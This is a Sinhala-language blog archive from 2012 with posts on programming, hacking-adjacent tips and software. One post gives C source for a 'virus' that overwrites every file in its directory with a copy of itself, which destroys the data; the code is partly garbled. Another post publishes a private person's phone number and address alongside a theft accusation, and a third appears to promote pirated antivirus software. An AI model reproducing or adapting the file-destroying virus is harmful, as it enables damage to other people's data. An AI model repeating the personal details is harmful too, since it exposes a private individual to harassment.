Adlink

Sunday, June 17, 2012

මගේ ඇලට් පේ එකට රින්ගපු හරක් හොරා



මම අද දැක්කේ මම ගොඩ කාලෙකින් මගේ ඇලට් පේ එකට ගියෙ නැ මොකෙක්ද පොන්සි පැටියෙක් එකට transaction details change කරලා මගෙ ඒවා මකලා උගේ ඒවා දාලා මේ තියෙන්නේ එවා
 phone 0722669346 
address 594 
Gamogoda 
Galle
 තමුසෙ අලි හොරෙක් ලජ්ජ නැද්ද තමුසෙට

Saturday, June 16, 2012

Ceylon (programming language)



හායි කස්ටිය මාතෘකාව දැක්කම මොකක්ද කියලා එක පාරටම හිතාගන්න අමාරුයි නේද.දැන් අපේ රටේ නම තියෙන පරිගණක භාශාවකුත් නිකුත් වෙලා මේක 2011 ඉදන් තමා නිකුත් වෙලා තියෙන්නේ,රෙඩ් හැට් සමාගම විසින් නිපාදනය කරපු මෙම language එක design කරලා තියෙන්නේ Gavin King කියන මහත්මයෙක් මෙම සිලොන් පරිගනක භාශාවේ extention එක විදිහට .ceylon යන්න තමා යෙදෙන්නේ.(අපිටත් ආඩම්බරයි නේද අපේ රටට කලින් කියපු නමක් ටියෙන නිසා)තව විශ්ලේශයකයන් කියන අන්දමට මේක Red Hat builds Java killer replacementඑකක් විදිහට තමා හදුන් වන්නේ මේක JVM(java virtual machine )එක උඩ තමා run වෙන්නේම්ම් තව මේම පරිගණක භාශාව ගැන කියනවානම් මේක සදහා Java, Scala, Smalltalk යන පරිගනක භාශාවන්ගේ ආභාශය ලැබී තියෙනවා (Scala as a possible successor to java)
Ceylon වලදි  Hello World ලියන්නේ මෙහෙමයි

void hello() {
    print("Hello, World!");
}

 මේ ගැන වැඩි විස්තර දැන ගැනිමට පහත සදහන් ලින්ක්ස් භාවිතා කරන්න පුලුවන්


එහෙනම් තව ලිපියකින් හමු වෙන බලාපොරොත්තුවෙන් අපි ගියා
 ජය ශ්‍රි !


link 1


link 2




Friday, June 15, 2012

ESET Smart Security Free





කොහොමද යාලුවනේ අද මම කියලා දෙන්න යන්නේ කොහොමද Eset Smart Security මුදල් නොගෙවා ගන්නේ කියලා.ඔයාලා දන්නවා ගොඩක් virus guard තිබුනට සමහර ඒවට ගොඩක් virus අහු වෙන්නේ නැ වගේම සමහර virus guard නිසා ඔබගේ පරිගනකයේ වේගය බොහෝ සෙයින් අඩු විමට බලපානවා.නමුත් Eset භාවිතයේදි ඔබගේ පරිගනකයේ වේගය අඩු විම වෙනත් anti virus protection එක්ක සැසදිමේදි බොහෝ සෙයින් අඩුයි.මම මෙය ඔබට පැහැදිලි විම සදහා video එකක් නිර්මාණය කරා.ඔබට video එකේ සදහන් සොෆ්ට්වෙයා එක download කරගැනිමට ලින්ක් එක පහතින් සදහන් කරනම් ,එහනම් නැවත ලිපියකින් හමුවෙන බලාපොරොතුවෙන් අපි ගියා
 කස්ටියටම ජය ශ්‍රි !


Link 1






Thursday, June 14, 2012

How To Install Back Track Using Pen Drive




හායි කස්ටිය අද මම පොඩි video එකක් කරා කොහොමද pen drive එකක් භාවිතා කරලා Back Track 5 install කර ගන්නේ කියලා මේ සදහා අපිට පහත සදහන් software එක භාවිත කරන්න වෙනවා ,ඩවුන්ලෝඩ් ලින්ක් එක මම පහත සදහන් කරන්නමමෙහෙනම් බලන්නකෝ video එක හොදද කියලා එහෙනම් නැවත ලිපියකින් හමුවෙමු ජය ශ්‍රී !
http://ity.im/0rN07










Tuesday, June 12, 2012

Simple Virus Using C





හායි කස්ටිය ගොඩ දවසකින් ඔයාලට ටෙක්නිකල් සම්බන්ද පෝස්ට් එකක් දාන්නත් බැරි උනා අද කියල දෙන්න යන්නේ කොහොමද c programing language එක භාවිතා කරලා සරල විදිහේ virus එකක් හදන්නේ කියලා,educational purpose වලට විතරක් මේක පාවිචි කරන්න.ඔයාලට ඉදිරියේදි c programing language එක ගැන පාඩම් මාලාවක් ගේන්නත් බලාපොරොත්තු වෙනවා.ඔයාලට මෙහිදි C  source code එක compile කර ගැනිමට අවශය වෙනවා.මේ සදහා ලේසිම විදිහ ලෙස dev c++ හෝ code blocks ඔයාලට යොදා ගන්න පුලුවන්.
code blocks Download කර ගන්න මෙතනින්
 නැත්නම් 
 dev c++ download කර ගන්න


ඔයාලට කරන්න තියෙන්නෙ හරිම සිම්පල් දෙයක් මම දිලා තියෙන ලින්ක් වලින් ඔයා කැමති එකක් භාවිතා කරලා අපිට අවශය කරන කොඩ් එක compile කර ගැනිමට අවශය IDE එක download කරගන්න. code blocks එක 70mb වන අටර dev c++ 13.5 mb විතර වෙනවා.
ඔබ කැමති එකක් භාගත කරගෙන installe කරන්න හරිම ලේසි.ඉන් පසු file new -->ඔනි කරන කොඩ් එක පේස්ට් කරලා save as  ගිහින් කැමති නමක් එක්ක ෆයිල් ෆොමැට් එක ලෙස  C source file යන්න තෝරන්න.
මේ ටික කිවේ C ගැන දැනුමක් නැති අය සදහා .මෙහිදි exe එකක් හැදෙන අටර එය virus  එක ලෙස ක්‍රියා කරයි එක නිසා exe එක හැදුනට පස්සේ run කරන්න එපා මොකද මෙහිදි වෙන්නේ folder එකක් තුල නැවත නැවත folder සකස් විමයි.Educational purpose only dont missuse IT
source code:



#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: FolderFllod\nProgrammer:MoulderFiles.blogspot.com\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}





Tuesday, April 17, 2012

Earn Money From Blog

හායි කස්ටිය හැමෝටම කිරියෙන් පැණියෙන් සරු වුන සුබ නව වසරක් වේවා කියලා ප්‍රාර්තනා කරන ගමන්  අද කියන්න යන්නේ කොහොමද ඔයාලගේ බ්ලොග් එකෙන් කීයක් හරි හොයා ගන්නේ කියලා,මාත් මේ ගැන දැන ගත්තේ වැඩ කිඩ එකේ අය්යා දාලා තිබ්බ පොස්ට් එකකින්.වැඩ කිඩ බ්ලොග් එකට මෙතනින් යන්න.
මේ video එකේ තියෙනවා කරන විදිහ ඔක්කෝම,කැමති කෙනෙක් ඉන්නවනම් පහත තියෙන බැනර් එක ක්ලික් කරලා register වෙන්න. අලුත් අවුරුද්දට අලුත් ජාති ගොඩක් ඔයාලා වෙත ගෙන එන්න බලාපොරොතු වෙනවා,
තව පොස්ට් එකකින් හමු වෙමු ජය ශ්‍රි !









Thursday, March 1, 2012

Free MMS යවන්න

හි කස්ටිය දැන් ඔයාලට නොමිලේම MMS  යවන්න ප්ලුව්කං ඒ සදහා දකුණු පස ඇති කොටසේ ඔබට අවශ්‍ය දුරකත අංකය සටහන් කිරීමෙන් කර ගත හැක.මේ සේවය ලබා දෙන
http://www.freecalls.jayashricombine.com/freemmscode.html
වෙත තැන්කූ කියන ගමන් තව පොස්ට් එකකින් හමු වෙමු.
ජය ශ්‍රී !

Saturday, February 18, 2012

කොලවරී එකට පස්සේ දනුශ් ගේ අලුත් සින්දුව ඇහුවද


Hide & Seek Folders හංගමු

hi කස්ටිය ගොඩ කාලෙකින් පොස්ට් එකක් දාන්නත් බැරි උනා.අද මම කියලා දෙන්න යන්නේ කොහොමද 

අපි CMD වල Attrib වලින් file හැංගන විදිහටම Bat file එකකින් ඒ වැඩේ කරගන්නේ කියලා හරිම 


ලේසි.ඔයාලා මුලින්ම note pad එක open කර ගන්න ඉන්පසු මේ 


විදිහට ටයිප් කරන්න 
.
ආ කියන්න බැරි උනා 


මෙහිදී අපිට hide හා  seek ලෙස bat file දෙකක් හදා ගන්න 


ඕනි.මුලින්ම හයිඩ් එකට bat file එක 


ලියා ගමු.


 Hide file එකේ කෝඩ්  එක.



cd\

E:

attrib +r +s +h sameera

මෙතන  H ලෙස මගේ sameera කියන ෆයිල් එක තියෙන හාඩ් ඩිස්ක්
 එකේ  නම මෙත්න තියෙන්නේ ඔයාලට හංගන්න 

ඕනි ෆයිල් එක තියෙන driver එකේ නම මෙතනට දෙන්න .E  වෙනුවට .

ඉන්පසු මෙහි sameera කියලා දාලා තියෙන්නේ මට හංගන්න ඕනි 

ෆෝල්ඩර් එකේ නම එකට ඔයාලට හංගන්න ඕනි 

ෆෝල්ඩර් එකේ නම දෙන්න .

ඉන්පසු කැමැති නමක් දෙන්න දීලා අන්තිමට ඩොට් එකක් දාලා bat 

extension  එක දෙන්න .

උදා hide.bat

ඉන්පසු  save as file type එකට  all files  කියන එක තෝරන්න .

මේක තමා අපි ෆෝල්ඩර් හංගන්න ලියන bat ෆයිල් එක .

දැන් අපි බලමු හංගපු ෆයිල් එක බලා ගන්නේ කොහොමද කියලා ඒ 

කට අපි තව bat file එකක් ලියා ගන්න ඕනි 


seek.bat  කියලා තව bat file  එකක් 


cd\


E:


attrib +r +s -h sameera

  මෙහිදී වෙනස් වෙන්නනේ  +h ලෙස තිබුන එක -h ලෙස වෙනස් 

වීමයි.

මේකත් අර කලින් කිව විදිහටම save කර ගන්න.

තව පොස්ට් එකකින්  හමු වෙමු ජය ශ්‍රී 

Friday, December 16, 2011

Create Encryptor And Decryptor Using Vbs



හලෝ කස්ටිය ගොඩ දවසකින් පොස්ට් එකක් දාන්නත් බැරි උනා,බ්ලොග් එක බලන්න ආව හැමෝටම Thanks .අද මම ඔයාලට කියලා දෙන්න යන්නේ කොහොමද සිම්පල් විදිහට අපිට අවශය දෙයක් Encrypt කරගන්නේ කියලා.ම්ම්ම් Encrypt ගැන මොනවත්ම දන් නැති අය කලබල වෙන්න එපා.අපි මෙහෙම හිතමු.
මට ඕනි moulderfiles කියලා රහස් පණිවිඩයක් යවන්න එහෙමනම් මේක encrypt කරාට පස්සේ xjqnkwjiqztr
විදිහට තමා පෙන්නන්නේ.නැවත අපි xjqnkwjiqztr කියන එක decrypt කරාට පස්සේ අපිට moulderfiles
කියන එක නැවත බලාගන්න පුලුවන්.හොරෙන් හොරෙන් ලවු කරන අයටනම් ෆට්ට මොකද encrypt කරලා අවශය දේ යවනවා.අනිත් පැත්තට decrypt කරලා සැගවුනු පණිවිඩය දැනගන්න පුලුවන්.මම හිතනවා ඔයාලට encrypt ගැන යම් කිසි අදහසක් ඔලුවට යන්න ඇති කියලා.හරි අපි එහෙනම් අපි මුලින්ම වැඩේ පටන් ගමු. හරිම සිම්පල් මේක කරන එක.ඔයාලට කැමති Programming Language එකක් මේකට පාවිචි කරන්න පුලුවන්.මම මෙහිදී vbs වලින් තමා මේක කරන්නේ.මුලින්ම notepad open කරගන්න.ඊට පස්සේ මේ Code එක type කරන්න.කම්මැලි නම් කෙලින්ම කොපි පේස්ට් පාරක් දාන්න අවුලක් නැ :)
Encrypt Code එක



set x=WScript.CreateObject("WScript.Shell")'Sameera Dissanayaka
mysecret =inputbox("enter text to encoded")
mysecret =StrReverse(mysecret)
x.Run "%windir%\notepad"
wscript.sleep 1000
x.sendkeys encode(mysecret)


function encode(s)
for i= 1 To Len(s)
newtxt = Mid(s,i,1)
newtxt =Chr(Asc(newtxt)+5)
coded=coded & newtxt
next
encode=coded
End Function
දැන් මේක save as ගිහින් කැමති නමක් දීලා සේව් කරන්න අගට vbs කියන exetention එක මතක ඇතිව දාන්න.save as type එකට All Files select කරන්න.
ඊට පස්සේ ඔයාලට දකින්නට ලැබෙයි save කරපු තැන anyname.vbs  file එකක් එක double click කරාම එන window එකේ ඔයාලට අවශය word එක ගහලා encrypt කරගන්න.space තියන්න එපා type කරනකොට.
දැන් අපි මේක Decrypt කරලා බලමු. code එක පහල දාන්නම්



set x=WScript.CreateObject("WScript.Shell")'Sameera Dissanayaka
mysecret =inputbox("enter text to encoded")
mysecret =StrReverse(mysecret)
x.Run "%windir%\notepad"
wscript.sleep 1000
x.sendkeys encode(mysecret)


function encode(s)
for i= 1 To Len(s)
newtxt = Mid(s,i,1)
newtxt =Chr(Asc(newtxt)-5)
coded=coded & newtxt
next
encode=coded
End Function
මේකත් අර විදිහටම decrypt.vbs වගේ නමක් දිලා save කරගන්න.ඊට පස්සේ කලින් අපි encrypt කරගතට පස්සේ ආව result එක decrypt එකේ inputbox එකේ past කරන්න.හරි ලේසි  එහෙනම් තවත් පෝස්ට් එකකින් හමුවෙමු ජය ශ්‍රි !